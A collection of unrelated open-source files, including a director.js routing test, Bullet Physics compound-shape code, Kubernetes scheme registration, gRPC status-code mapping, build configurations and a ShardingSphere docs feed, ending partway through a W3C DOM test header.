/* * path-test.js: Tests for the core `.path()` method. * * (C) 2011, Charlie Robbins, Paolo Fragomeni, & the Contributors. * MIT LICENSE * */ var assert = require('assert'), vows = require('vows'), director = require('../../../lib/director'); vows.describe('director/core/path').addBatch({ "An instance of director.Router": { topic: function () { var that = this; that.matched = {}; that.matched['foo'] = []; that.matched['newyork'] = []; var router = new director.Router({ '/foo': function () { that.matched['foo'].push('foo'); } }); return router; }, "the path() method": { "should create the correct nested routing table": function (router) { var that = this; router.path('/regions', function () { this.on('/:state', function(country) { that.matched['newyork'].push('new york'); }); }); assert.isFunction(router.routes.foo.on); assert.isObject(router.routes.regions); assert.isFunction(router.routes.regions['([._a-zA-Z0-9-%()]+)'].on); }, "should dispatch the function correctly": function (router) { router.dispatch('on', '/regions/newyork') router.dispatch('on', '/foo'); assert.equal(this.matched['foo'].length, 1); assert.equal(this.matched['newyork'].length, 1); assert.equal(this.matched['foo'][0], 'foo'); assert.equal(this.matched['newyork'][0], 'new york'); } } } }).export(module);
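The same nested-routing API the test exercises, in plain standalone form (a sketch; the require path assumes the published director package):

// path()/on()/dispatch() as exercised by the vows test above.
var director = require('director');

var router = new director.Router({
  '/foo': function () { console.log('foo'); }
});

router.path('/regions', function () {
  this.on('/:state', function (state) {
    console.log('region:', state);
  });
});

router.dispatch('on', '/foo');             // logs "foo"
router.dispatch('on', '/regions/newyork'); // logs "region: newyork"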
{ "pile_set_name": "Github" }
/* Bullet Continuous Collision Detection and Physics Library Copyright (c) 2003-2009 Erwin Coumans http://bulletphysics.org This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. */ #include "btCompoundShape.h" #include "btCollisionShape.h" #include "BulletCollision/BroadphaseCollision/btDbvt.h" #include "LinearMath/btSerializer.h" btCompoundShape::btCompoundShape(bool enableDynamicAabbTree, const int initialChildCapacity) : m_localAabbMin(btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT)), m_localAabbMax(btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT)), m_dynamicAabbTree(0), m_updateRevision(1), m_collisionMargin(btScalar(0.)), m_localScaling(btScalar(1.), btScalar(1.), btScalar(1.)) { m_shapeType = COMPOUND_SHAPE_PROXYTYPE; if (enableDynamicAabbTree) { void* mem = btAlignedAlloc(sizeof(btDbvt), 16); m_dynamicAabbTree = new (mem) btDbvt(); btAssert(mem == m_dynamicAabbTree); } m_children.reserve(initialChildCapacity); } btCompoundShape::~btCompoundShape() { if (m_dynamicAabbTree) { m_dynamicAabbTree->~btDbvt(); btAlignedFree(m_dynamicAabbTree); } } void btCompoundShape::addChildShape(const btTransform& localTransform, btCollisionShape* shape) { m_updateRevision++; //m_childTransforms.push_back(localTransform); //m_childShapes.push_back(shape); btCompoundShapeChild child; child.m_node = 0; child.m_transform = localTransform; child.m_childShape = shape; child.m_childShapeType = shape->getShapeType(); child.m_childMargin = shape->getMargin(); //extend the local aabbMin/aabbMax btVector3 localAabbMin, localAabbMax; shape->getAabb(localTransform, localAabbMin, localAabbMax); for (int i = 0; i < 3; i++) { if (m_localAabbMin[i] > localAabbMin[i]) { m_localAabbMin[i] = localAabbMin[i]; } if (m_localAabbMax[i] < localAabbMax[i]) { m_localAabbMax[i] = localAabbMax[i]; } } if (m_dynamicAabbTree) { const btDbvtVolume bounds = btDbvtVolume::FromMM(localAabbMin, localAabbMax); size_t index = m_children.size(); child.m_node = m_dynamicAabbTree->insert(bounds, reinterpret_cast<void*>(index)); } m_children.push_back(child); } void btCompoundShape::updateChildTransform(int childIndex, const btTransform& newChildTransform, bool shouldRecalculateLocalAabb) { m_children[childIndex].m_transform = newChildTransform; if (m_dynamicAabbTree) { ///update the dynamic aabb tree btVector3 localAabbMin, localAabbMax; m_children[childIndex].m_childShape->getAabb(newChildTransform, localAabbMin, localAabbMax); ATTRIBUTE_ALIGNED16(btDbvtVolume) bounds = btDbvtVolume::FromMM(localAabbMin, localAabbMax); //int index = m_children.size()-1; m_dynamicAabbTree->update(m_children[childIndex].m_node, bounds); } if (shouldRecalculateLocalAabb) { recalculateLocalAabb(); } } void btCompoundShape::removeChildShapeByIndex(int childShapeIndex) 
{ m_updateRevision++; btAssert(childShapeIndex >= 0 && childShapeIndex < m_children.size()); if (m_dynamicAabbTree) { m_dynamicAabbTree->remove(m_children[childShapeIndex].m_node); } m_children.swap(childShapeIndex, m_children.size() - 1); if (m_dynamicAabbTree) m_children[childShapeIndex].m_node->dataAsInt = childShapeIndex; m_children.pop_back(); } void btCompoundShape::removeChildShape(btCollisionShape* shape) { m_updateRevision++; // Find the children containing the shape specified, and remove those children. //note: there might be multiple children using the same shape! for (int i = m_children.size() - 1; i >= 0; i--) { if (m_children[i].m_childShape == shape) { removeChildShapeByIndex(i); } } recalculateLocalAabb(); } void btCompoundShape::recalculateLocalAabb() { // Recalculate the local aabb // Brute force, it iterates over all the shapes left. m_localAabbMin = btVector3(btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT)); m_localAabbMax = btVector3(btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT)); //extend the local aabbMin/aabbMax for (int j = 0; j < m_children.size(); j++) { btVector3 localAabbMin, localAabbMax; m_children[j].m_childShape->getAabb(m_children[j].m_transform, localAabbMin, localAabbMax); for (int i = 0; i < 3; i++) { if (m_localAabbMin[i] > localAabbMin[i]) m_localAabbMin[i] = localAabbMin[i]; if (m_localAabbMax[i] < localAabbMax[i]) m_localAabbMax[i] = localAabbMax[i]; } } } ///getAabb's default implementation is brute force, expected derived classes to implement a fast dedicated version void btCompoundShape::getAabb(const btTransform& trans, btVector3& aabbMin, btVector3& aabbMax) const { btVector3 localHalfExtents = btScalar(0.5) * (m_localAabbMax - m_localAabbMin); btVector3 localCenter = btScalar(0.5) * (m_localAabbMax + m_localAabbMin); //avoid an illegal AABB when there are no children if (!m_children.size()) { localHalfExtents.setValue(0, 0, 0); localCenter.setValue(0, 0, 0); } localHalfExtents += btVector3(getMargin(), getMargin(), getMargin()); btMatrix3x3 abs_b = trans.getBasis().absolute(); btVector3 center = trans(localCenter); btVector3 extent = localHalfExtents.dot3(abs_b[0], abs_b[1], abs_b[2]); aabbMin = center - extent; aabbMax = center + extent; } void btCompoundShape::calculateLocalInertia(btScalar mass, btVector3& inertia) const { //approximation: take the inertia from the aabb for now btTransform ident; ident.setIdentity(); btVector3 aabbMin, aabbMax; getAabb(ident, aabbMin, aabbMax); btVector3 halfExtents = (aabbMax - aabbMin) * btScalar(0.5); btScalar lx = btScalar(2.) * (halfExtents.x()); btScalar ly = btScalar(2.) * (halfExtents.y()); btScalar lz = btScalar(2.) 
* (halfExtents.z()); inertia[0] = mass / (btScalar(12.0)) * (ly * ly + lz * lz); inertia[1] = mass / (btScalar(12.0)) * (lx * lx + lz * lz); inertia[2] = mass / (btScalar(12.0)) * (lx * lx + ly * ly); } void btCompoundShape::calculatePrincipalAxisTransform(const btScalar* masses, btTransform& principal, btVector3& inertia) const { int n = m_children.size(); btScalar totalMass = 0; btVector3 center(0, 0, 0); int k; for (k = 0; k < n; k++) { btAssert(masses[k] > 0); center += m_children[k].m_transform.getOrigin() * masses[k]; totalMass += masses[k]; } btAssert(totalMass > 0); center /= totalMass; principal.setOrigin(center); btMatrix3x3 tensor(0, 0, 0, 0, 0, 0, 0, 0, 0); for (k = 0; k < n; k++) { btVector3 i; m_children[k].m_childShape->calculateLocalInertia(masses[k], i); const btTransform& t = m_children[k].m_transform; btVector3 o = t.getOrigin() - center; //compute inertia tensor in coordinate system of compound shape btMatrix3x3 j = t.getBasis().transpose(); j[0] *= i[0]; j[1] *= i[1]; j[2] *= i[2]; j = t.getBasis() * j; //add inertia tensor tensor[0] += j[0]; tensor[1] += j[1]; tensor[2] += j[2]; //compute inertia tensor of pointmass at o btScalar o2 = o.length2(); j[0].setValue(o2, 0, 0); j[1].setValue(0, o2, 0); j[2].setValue(0, 0, o2); j[0] += o * -o.x(); j[1] += o * -o.y(); j[2] += o * -o.z(); //add inertia tensor of pointmass tensor[0] += masses[k] * j[0]; tensor[1] += masses[k] * j[1]; tensor[2] += masses[k] * j[2]; } tensor.diagonalize(principal.getBasis(), btScalar(0.00001), 20); inertia.setValue(tensor[0][0], tensor[1][1], tensor[2][2]); } void btCompoundShape::setLocalScaling(const btVector3& scaling) { for (int i = 0; i < m_children.size(); i++) { btTransform childTrans = getChildTransform(i); btVector3 childScale = m_children[i].m_childShape->getLocalScaling(); // childScale = childScale * (childTrans.getBasis() * scaling); childScale = childScale * scaling / m_localScaling; m_children[i].m_childShape->setLocalScaling(childScale); childTrans.setOrigin((childTrans.getOrigin()) * scaling / m_localScaling); updateChildTransform(i, childTrans, false); } m_localScaling = scaling; recalculateLocalAabb(); } void btCompoundShape::createAabbTreeFromChildren() { if (!m_dynamicAabbTree) { void* mem = btAlignedAlloc(sizeof(btDbvt), 16); m_dynamicAabbTree = new (mem) btDbvt(); btAssert(mem == m_dynamicAabbTree); for (int index = 0; index < m_children.size(); index++) { btCompoundShapeChild& child = m_children[index]; //extend the local aabbMin/aabbMax btVector3 localAabbMin, localAabbMax; child.m_childShape->getAabb(child.m_transform, localAabbMin, localAabbMax); const btDbvtVolume bounds = btDbvtVolume::FromMM(localAabbMin, localAabbMax); size_t index2 = index; child.m_node = m_dynamicAabbTree->insert(bounds, reinterpret_cast<void*>(index2)); } } } ///fills the dataBuffer and returns the struct name (and 0 on failure) const char* btCompoundShape::serialize(void* dataBuffer, btSerializer* serializer) const { btCompoundShapeData* shapeData = (btCompoundShapeData*)dataBuffer; btCollisionShape::serialize(&shapeData->m_collisionShapeData, serializer); shapeData->m_collisionMargin = float(m_collisionMargin); shapeData->m_numChildShapes = m_children.size(); shapeData->m_childShapePtr = 0; if (shapeData->m_numChildShapes) { btChunk* chunk = serializer->allocate(sizeof(btCompoundShapeChildData), shapeData->m_numChildShapes); btCompoundShapeChildData* memPtr = (btCompoundShapeChildData*)chunk->m_oldPtr; shapeData->m_childShapePtr = (btCompoundShapeChildData*)serializer->getUniquePointer(memPtr); 
for (int i = 0; i < shapeData->m_numChildShapes; i++, memPtr++) { memPtr->m_childMargin = float(m_children[i].m_childMargin); memPtr->m_childShape = (btCollisionShapeData*)serializer->getUniquePointer(m_children[i].m_childShape); //don't serialize shapes that already have been serialized if (!serializer->findPointer(m_children[i].m_childShape)) { btChunk* chunk = serializer->allocate(m_children[i].m_childShape->calculateSerializeBufferSize(), 1); const char* structType = m_children[i].m_childShape->serialize(chunk->m_oldPtr, serializer); serializer->finalizeChunk(chunk, structType, BT_SHAPE_CODE, m_children[i].m_childShape); } memPtr->m_childShapeType = m_children[i].m_childShapeType; m_children[i].m_transform.serializeFloat(memPtr->m_transform); } serializer->finalizeChunk(chunk, "btCompoundShapeChildData", BT_ARRAY_CODE, chunk->m_oldPtr); } return "btCompoundShapeData"; }
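A minimal sketch of the child-shape API implemented above. Note that btCompoundShape does not take ownership of its children, so the caller keeps them alive:

// Build a compound from two boxes; inertia uses the AABB approximation above.
#include "btBulletCollisionCommon.h"

int main()
{
    btBoxShape boxA(btVector3(1, 1, 1));
    btBoxShape boxB(btVector3(0.5, 0.5, 0.5));

    btCompoundShape compound;  // dynamic AABB tree enabled by default
    btTransform local;
    local.setIdentity();
    compound.addChildShape(local, &boxA);
    local.setOrigin(btVector3(0, 2, 0));
    compound.addChildShape(local, &boxB);

    btVector3 inertia;
    compound.calculateLocalInertia(btScalar(2.0), inertia);
    compound.removeChildShape(&boxB);  // also recalculates the local AABB
    return 0;
}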
{ "pile_set_name": "Github" }
package io.craft.atom.io; /** * MBean for {@link IoAcceptor} * * @author mindwind * @version 1.0, Dec 24, 2013 */ public interface IoAcceptorMBean { /** * @return x-ray of {@link IoAcceptor} */ IoAcceptorX x(); }
{ "pile_set_name": "Github" }
/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package v1alpha1 import ( metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/runtime" "k8s.io/apimachinery/pkg/runtime/schema" ) // GroupName is the group name use in this package const GroupName = "scheduling.k8s.io" // SchemeGroupVersion is group version used to register these objects var SchemeGroupVersion = schema.GroupVersion{Group: GroupName, Version: "v1alpha1"} // Resource takes an unqualified resource and returns a Group qualified GroupResource func Resource(resource string) schema.GroupResource { return SchemeGroupVersion.WithResource(resource).GroupResource() } var ( // TODO: move SchemeBuilder with zz_generated.deepcopy.go to k8s.io/api. // localSchemeBuilder and AddToScheme will stay in k8s.io/kubernetes. SchemeBuilder = runtime.NewSchemeBuilder(addKnownTypes) localSchemeBuilder = &SchemeBuilder AddToScheme = localSchemeBuilder.AddToScheme ) // Adds the list of known types to the given scheme. func addKnownTypes(scheme *runtime.Scheme) error { scheme.AddKnownTypes(SchemeGroupVersion, &PriorityClass{}, &PriorityClassList{}, ) metav1.AddToGroupVersion(scheme, SchemeGroupVersion) return nil }
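A short sketch of how a package like this is consumed. The import path below is an assumption (it depends on whether this copy lives under k8s.io/api or k8s.io/kubernetes):

// Registering the group/version into a runtime.Scheme (import path assumed).
package main

import (
	"fmt"

	schedulingv1alpha1 "k8s.io/api/scheduling/v1alpha1" // assumed path
	"k8s.io/apimachinery/pkg/runtime"
)

func main() {
	scheme := runtime.NewScheme()
	if err := schedulingv1alpha1.AddToScheme(scheme); err != nil {
		panic(err)
	}
	gvk := schedulingv1alpha1.SchemeGroupVersion.WithKind("PriorityClass")
	fmt.Println(scheme.Recognizes(gvk)) // true once registered
}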
{ "pile_set_name": "Github" }
--- a/Setup.hs +++ b/Setup.hs @@ -7,7 +7,7 @@ import Data.List (foldl', intersperse, intercalate, nub, lookup, isPrefixOf, isI import Data.Maybe (fromJust) import Distribution.PackageDescription hiding (includeDirs) import qualified Distribution.PackageDescription as PD (includeDirs) -import Distribution.InstalledPackageInfo(installedPackageId, sourcePackageId, includeDirs) +import Distribution.InstalledPackageInfo({-installedPackageId,-} sourcePackageId, includeDirs) import Distribution.Simple import Distribution.Simple.LocalBuildInfo (LocalBuildInfo, localPkgDescr, installedPkgs, withPrograms, buildDir) import Distribution.Simple.PackageIndex(SearchResult (..), searchByName, allPackages )
{ "pile_set_name": "Github" }
config VIDEO_CAFE_CCIC tristate "Marvell 88ALP01 (Cafe) CMOS Camera Controller support" depends on PCI && I2C && VIDEO_V4L2 depends on HAS_DMA select VIDEO_OV7670 select VIDEOBUF2_VMALLOC select VIDEOBUF2_DMA_CONTIG select VIDEOBUF2_DMA_SG ---help--- This is a video4linux2 driver for the Marvell 88ALP01 integrated CMOS camera controller. This is the controller found on first- generation OLPC systems. config VIDEO_MMP_CAMERA tristate "Marvell Armada 610 integrated camera controller support" depends on ARCH_MMP && I2C && VIDEO_V4L2 depends on HAS_DMA && BROKEN select VIDEO_OV7670 select I2C_GPIO select VIDEOBUF2_DMA_SG ---help--- This is a Video4Linux2 driver for the integrated camera controller found on Marvell Armada 610 application processors (and likely beyond). This is the controller found in OLPC XO 1.75 systems.
{ "pile_set_name": "Github" }
/* * * Copyright 2015 gRPC authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ #include <grpc/support/port_platform.h> #include "src/core/lib/transport/status_conversion.h" grpc_http2_error_code grpc_status_to_http2_error(grpc_status_code status) { switch (status) { case GRPC_STATUS_OK: return GRPC_HTTP2_NO_ERROR; case GRPC_STATUS_CANCELLED: return GRPC_HTTP2_CANCEL; case GRPC_STATUS_DEADLINE_EXCEEDED: return GRPC_HTTP2_CANCEL; case GRPC_STATUS_RESOURCE_EXHAUSTED: return GRPC_HTTP2_ENHANCE_YOUR_CALM; case GRPC_STATUS_PERMISSION_DENIED: return GRPC_HTTP2_INADEQUATE_SECURITY; case GRPC_STATUS_UNAVAILABLE: return GRPC_HTTP2_REFUSED_STREAM; default: return GRPC_HTTP2_INTERNAL_ERROR; } } grpc_status_code grpc_http2_error_to_grpc_status(grpc_http2_error_code error, grpc_millis deadline) { switch (error) { case GRPC_HTTP2_NO_ERROR: /* should never be received */ return GRPC_STATUS_INTERNAL; case GRPC_HTTP2_CANCEL: /* http2 cancel translates to STATUS_CANCELLED iff deadline hasn't been * exceeded */ return grpc_core::ExecCtx::Get()->Now() > deadline ? GRPC_STATUS_DEADLINE_EXCEEDED : GRPC_STATUS_CANCELLED; case GRPC_HTTP2_ENHANCE_YOUR_CALM: return GRPC_STATUS_RESOURCE_EXHAUSTED; case GRPC_HTTP2_INADEQUATE_SECURITY: return GRPC_STATUS_PERMISSION_DENIED; case GRPC_HTTP2_REFUSED_STREAM: return GRPC_STATUS_UNAVAILABLE; default: return GRPC_STATUS_INTERNAL; } } grpc_status_code grpc_http2_status_to_grpc_status(int status) { switch (status) { /* these HTTP2 status codes are called out explicitly in status.proto */ case 200: return GRPC_STATUS_OK; case 400: return GRPC_STATUS_INVALID_ARGUMENT; case 401: return GRPC_STATUS_UNAUTHENTICATED; case 403: return GRPC_STATUS_PERMISSION_DENIED; case 404: return GRPC_STATUS_NOT_FOUND; case 409: return GRPC_STATUS_ABORTED; case 412: return GRPC_STATUS_FAILED_PRECONDITION; case 429: return GRPC_STATUS_RESOURCE_EXHAUSTED; case 499: return GRPC_STATUS_CANCELLED; case 500: return GRPC_STATUS_UNKNOWN; case 501: return GRPC_STATUS_UNIMPLEMENTED; case 503: return GRPC_STATUS_UNAVAILABLE; case 504: return GRPC_STATUS_DEADLINE_EXCEEDED; /* everything else is unknown */ default: return GRPC_STATUS_UNKNOWN; } } int grpc_status_to_http2_status(grpc_status_code status) { return 200; }
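These converters are grpc-core internals rather than public API; the sketch below assumes a translation unit compiled inside the gRPC source tree, where the internal header is reachable:

// Illustrative sketch; buildable only within the gRPC source tree.
#include <grpc/support/port_platform.h>

#include <stdio.h>

#include <grpc/status.h>

#include "src/core/lib/transport/status_conversion.h"

int main() {
  // Cancellation maps straight onto the HTTP/2 CANCEL error code.
  printf("%d\n", grpc_status_to_http2_error(GRPC_STATUS_CANCELLED) == GRPC_HTTP2_CANCEL);
  // HTTP status 404 is one of the codes called out explicitly above.
  printf("%d\n", grpc_http2_status_to_grpc_status(404) == GRPC_STATUS_NOT_FOUND);
  return 0;
}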
{ "pile_set_name": "Github" }
// This file is part of openCaesar3. // // openCaesar3 is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // openCaesar3 is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with openCaesar3. If not, see <http://www.gnu.org/licenses/>. #ifndef __OPENCAESAR3_PROTESTOR_H_INCLUDE_ #define __OPENCAESAR3_PROTESTOR_H_INCLUDE_ #include "walker.hpp" class Protestor : public Walker { public: static ProtestorPtr create( CityPtr city ); virtual ~Protestor(); virtual void onNewTile(); virtual void onDestination(); virtual void timeStep(const unsigned long time); void send2City( HousePtr house ); virtual void die(); virtual void save(VariantMap &stream) const; virtual void load(const VariantMap &stream); private: Protestor( CityPtr city ); class Impl; ScopedPtr<Impl> _d; }; #endif//__OPENCAESAR3_PROTESTOR_H_INCLUDE_
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8" standalone="yes"?> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>Test Engine on ShardingSphere</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/</link> <description>Recent content in Test Engine on ShardingSphere</description> <generator>Hugo -- gohugo.io</generator> <language>en-us</language> <atom:link href="https://shardingsphere.apache.org/document/current/en/features/test-engine/index.xml" rel="self" type="application/rss+xml" /> <item> <title>SQL Case</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/sql-case/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/sql-case/</guid> <description>Target The code for SQL case is in module sharding-sql-test.There are two targets for this module: Test the wildcard replacement by unit test. Share the SQL resource in resources folder. &amp;lt;sql-cases&amp;gt; &amp;lt;sql-case id=&amp;#34;select_constant_without_table&amp;#34; value=&amp;#34;SELECT 1 as a&amp;#34; /&amp;gt; &amp;lt;sql-case id=&amp;#34;select_with_same_table_name_and_alias&amp;#34; value=&amp;#34;SELECT t_order.* FROM t_order t_order WHERE user_id = ? AND order_id = ?&amp;#34; /&amp;gt; &amp;lt;sql-case id=&amp;#34;select_with_same_table_name_and_alias_column_with_owner&amp;#34; value=&amp;#34;SELECT t_order.order_id,t_order.user_id,status FROM t_order t_order WHERE t_order.user_id = ? AND order_id = ?</description> </item> <item> <title>Integration Test Engine</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/integration-test-engine/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/integration-test-engine/</guid> <description>Process The Parameterized in JUnit will collect all test data, and pass to test method to assert one by one. 
The process of handling test data is just like a leaking hourglass: Configuration environment type /shardingsphere-test-suite/src/test/resources/integrate/env.properties /shardingsphere-test-suite/src/test/resources/integrate/env/SQL-TYPE/dataset.xml /shardingsphere-test-suite/src/test/resources/integrate/env/SQL-TYPE/schema.xml test case type /shardingsphere-test-suite/src/test/resources/integrate/cases/SQL-TYPE/SQL-TYPE-integrate-test-cases.xml /shardingsphere-test-suite/src/test/resources/integrate/cases/SQL-TYPE/dataset/FEATURE-TYPE/*.xml sql-case /sharding-sql-test/src/main/resources/sql/sharding/SQL-TYPE/*.xml Environment Configuration Integration test depends on existed database environment, developer need to setup the configuration file for corresponding database to test:</description> </item> <item> <title>SQL Parse Test Engine</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/parse-test-engine/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/parse-test-engine/</guid> <description>Prepare Data Not like Integration test, SQL parse test does not need a specific database environment, just define the sql to parse, and the assert data: SQL Data As mentioned sql-case-id in Integration test,test-case-id could be shared in different module to test, and the file is at /sharding-sql-test/src/main/resources/sql/sharding/SQL-TYPE/*.xml Parser Assert Data The assert data is at /sharding-core/sharding-core-parse/sharding-core-parse-test/src/test/resources/sharding/SQL-TYPE/*.xml in that xml file, it could assert against the table name, token or sql condition and so on.</description> </item> <item> <title>SQL Rewrite Test Engine</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/rewrite-test-engine/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/rewrite-test-engine/</guid> <description>Target Facing logic databases and tables cannot be executed directly in actual databases. SQL rewrite is used to rewrite logic SQL into rightly executable ones in actual databases, including two parts, correctness rewrite and optimization rewrite. rewrite tests are for these targets. Test The rewrite tests are in the test folder under sharding-core/sharding-core-rewrite . Followings are the main part for rewrite tests: test engine environment configuration assert data Test engine is the entrance of rewrite tests, just like other test engines, through Junit Parameterized, read every and each data in the xml file under the target test type in test\resources, and then assert by the engine one by one</description> </item> <item> <title>Performance Test</title> <link>https://shardingsphere.apache.org/document/current/en/features/test-engine/performance-test/</link> <pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate> <guid>https://shardingsphere.apache.org/document/current/en/features/test-engine/performance-test/</guid> <description>Target The performance of ShardingSphere-JDBC, ShardingSphere-Proxy and MySQL would be compared here. INSERT &amp;amp; UPDATE &amp;amp; DELETE which regarded as a set of associated operation and SELECT which focus on sharding optimization are used to evaluate performance for the basic scenarios (single route, primary-replica replication &amp;amp; encrypt &amp;amp; sharding, full route). 
While another set of associated operation, INSERT &amp;amp; SELECT &amp;amp; DELETE, is used to evaluate performance for primary-replica replication. To achieve the result better, these tests are performed with jmeter which based on a certain amount of data with 20 concurrent threads for 30 minutes, and one MySQL has been deployed on one machine, while the scenario of MySQL used for comparison is deployed on one machine with one instance.</description> </item> </channel> </rss>
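For readability, the sql-case snippet quoted (HTML-escaped) in the first item above unescapes to:

<sql-cases>
    <sql-case id="select_constant_without_table" value="SELECT 1 as a" />
    <sql-case id="select_with_same_table_name_and_alias" value="SELECT t_order.* FROM t_order t_order WHERE user_id = ? AND order_id = ?" />
</sql-cases>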
{ "pile_set_name": "Github" }
{ // Use IntelliSense to learn about possible Node.js debug attributes. // Hover to view descriptions of existing attributes. // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 "version": "0.2.0", "configurations": [ { "type": "node", "request": "launch", "name": "Launch Program", "preLaunchTask": "compile", "program": "${workspaceRoot}/node_modules/.bin/_mocha", "args": [ "test/build/test", "--opts", "test/mocha.opts" ], "cwd": "${workspaceRoot}", "outFiles": [ "${workspaceRoot}/dist/**/*.js" ], "sourceMaps": true } ] }
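The "compile" preLaunchTask above must be defined in the sibling .vscode/tasks.json. A hypothetical matching entry (label, command, and problem matcher are assumptions; only the label must agree with preLaunchTask):

// .vscode/tasks.json -- hypothetical companion for the "compile" preLaunchTask.
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "compile",
      "type": "shell",
      "command": "npm run build",
      "problemMatcher": "$tsc"
    }
  ]
}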
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="https://maven.apache.org/POM/4.0.0" xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="https://maven.apache.org/POM/4.0.0 https://maven.apache.org/maven-v4_0_0.xsd"> <modelVersion>4.0.0</modelVersion> <parent> <groupId>org.springframework.boot.ide</groupId> <artifactId>org.springframework.boot.ide.servers</artifactId> <version>4.8.1-SNAPSHOT</version> <relativePath>../pom.xml</relativePath> </parent> <artifactId>org.springframework.tooling.concourse.ls</artifactId> <version>1.23.0-SNAPSHOT</version> <packaging>eclipse-plugin</packaging> <build> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-dependency-plugin</artifactId> <version>2.10</version> <executions> <execution> <id>unpack-server</id> <phase>prepare-package</phase> <goals> <goal>unpack</goal> </goals> <configuration> <artifactItems> <artifactItem> <groupId>org.springframework.ide.vscode</groupId> <artifactId>concourse-language-server</artifactId> <version>${project.version}</version> <classifier>exec</classifier> <overWrite>true</overWrite> </artifactItem> </artifactItems> <overWriteReleases>true</overWriteReleases> <overWriteSnapshots>true</overWriteSnapshots> <outputDirectory>${project.build.directory}/../servers/concourse-language-server</outputDirectory> </configuration> </execution> <execution> <id>unpack</id> <phase>prepare-package</phase> <goals> <goal>unpack</goal> </goals> <configuration> <artifactItems> <artifactItem> <groupId>org.springframework.ide.vscode</groupId> <artifactId>concourse-language-server</artifactId> <version>${project.version}</version> <classifier>exec</classifier> <!-- <includes>META-INF/third-party-open-source-licenses*</includes> --> </artifactItem> </artifactItems> <includes>META-INF/third-party-open-source-licenses.txt,META-INF/third-party-open-source-licenses/**.*</includes> <outputDirectory>${project.build.directory}/../</outputDirectory> </configuration> </execution> </executions> </plugin> <plugin> <artifactId>maven-clean-plugin</artifactId> <version>3.1.0</version> <configuration> <filesets> <fileset> <directory>servers</directory> </fileset> </filesets> </configuration> </plugin> </plugins> </build> </project>
{ "pile_set_name": "Github" }
/* This Java source file was generated by test-to-java.xsl and is a derived work from the source document. The source document contained the following notice: Copyright (c) 2001 World Wide Web Consortium, (Massachusetts Institute of Technology, Institut National de Recherche en Informatique et en Automatique, Keio University). All Rights Reserved. This program is distributed under the W3C's Software Intellectual Property License. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See W3C License http://www.w3.org/Consortium/Legal/ for more details. */ package org.w3c.domts.level2.core; import org.w3c.dom.*; import org.w3c.domts.DOMTestCase; import org.w3c.domts.DOMTestDocumentBuilderFactory; /** * The "importNode(importedNode,deep)" method for a * Document should raise NOT_SUPPORTED_ERR DOMException if * the type of node being imported is DocumentType. * * Retrieve document staff.xml and get its type. * Invoke method importNode(importedNode,deep) where importedNode * contains the document type of the staff.xml. * Method should raise NOT_SUPPORT_ERR DOMException. * @author NIST * @author Mary Brady * @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('ID-258A00AF')/constant[@name='NOT_SUPPORTED_ERR'])">http://www.w3.org/TR/DOM-Level-2-Core/core#xpointer(id('ID-258A00AF')/constant[@name='NOT_SUPPORTED_ERR'])</a> * @see <a 